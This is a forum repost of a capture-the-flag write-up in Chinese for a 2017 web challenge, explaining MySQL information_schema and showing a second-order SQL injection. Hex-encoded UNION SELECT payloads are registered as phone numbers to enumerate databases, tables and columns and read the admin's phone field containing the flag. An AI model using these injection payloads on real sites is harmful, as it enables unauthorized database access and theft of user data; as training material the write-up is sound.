安全矩阵

 找回密码
 立即注册
搜索
查看: 3124|回复: 0

2017第二届广东省强网杯线上赛:phone number

[复制链接]

16

主题

99

帖子

543

积分

高级会员

Rank: 4

积分
543
发表于 2020-3-30 21:33:36 | 显示全部楼层 |阅读模式
本帖最后由 only 于 2020-3-31 23:54 编辑

2017第二届广东省强网杯线上赛:phone number

转载自:yytester
题目地址:http://106.75.72.168:3333
知识点
information_schema
information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,无法看到与之相关的任何文件。
操作步骤
  • 点击url,发现是个web页面,注册,登录,提示可以check手机号,点击check,会提示有多少人和你一样的号码
  • 查看上面各阶段报文,无异常发现,但是check后显示的页面源码里有一句注释听说admin的phone隐藏着秘密哦, 这意思就是告诉我们答案就在admin用户的phone字段.
  • 经过尝试,发现手机号码在注册时可以填入16进制数字,而登录后check手机号码时可以看到被后台转换为正常数字.
  • 将sql注入爆库语句1 union select schema_name from information_schema.schemata转为16进制:0x3120756e696f6e2073656c65637420736368656d615f6e616d652066726f6d20696e666f726d6174696f6e5f736368656d612e736368656d617461 , 作为手机号码填入,注册成功
  • 登录后,点击check,sql注入成功,页面部分源代码为:
    1. <div class="text" style=" text-align:center;">There only 22883 people use the same phone as you</div>
    2. <div class="text" style=" text-align:center;">There only information_schema people use the same phone as you</div>
    3. <div class="text" style=" text-align:center;">There only mysql people use the same phone as you</div>
    4. <div class="text" style=" text-align:center;">There only performance_schema people use the same phone as you</div>
    5. <div class="text" style=" text-align:center;">There only webdb people use the same phone as you</div><!-- 听说admin的phone隐藏着秘密哦
    复制代码


最后的注释告诉我们,flag就在admin用户的phone字段里

将sql注入爆表语句1 union select table_name from information_schema.tables转为16进制:0x3120756e696f6e2073656c656374207461626c655f6e616d652066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573 ,同样注册并登录,check,页面会显示数据库里的各个表名,可以发现有一个user表.
接下来是爆字段,语句1 union select column_name from information_schema.columns where table_name= 0x75736572(0x75736572是表名'user'的16进制)转为16进制3120756e696f6e2073656c6563742020636f6c756d6e5f6e616d65202066726f6d2020696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d2030783735373336353732,注册,登录,check,界面会显示表里的各个字段.
最后一步,根据第5步看到的源码提示,直接去user表找admin用户的phone. sql语句1 union select phone from user where username = 0x61646d696e转为16进制0x3120756e696f6e2073656c656374202070686f6e65202066726f6d20757365722077686572652020757365726e616d6520203d20307836313634366436393665,注册,登录,check,页面显示:
  1. There only 22917 people use the same phone as you
  2. There only flag{xxxxx-xxx-xxxx-xxxx-xx} people use the same phone as you
  3. There only 1555555 people use the same phone as you
  4. There only 15500956659 people use the same phone as you
  5. There only 1 people use the same phone as you
  6. There only 123456 people use the same phone as you
复制代码
页面显示的flag真实值在这我用xxxx替代了



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 00:34 , Processed in 0.012771 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表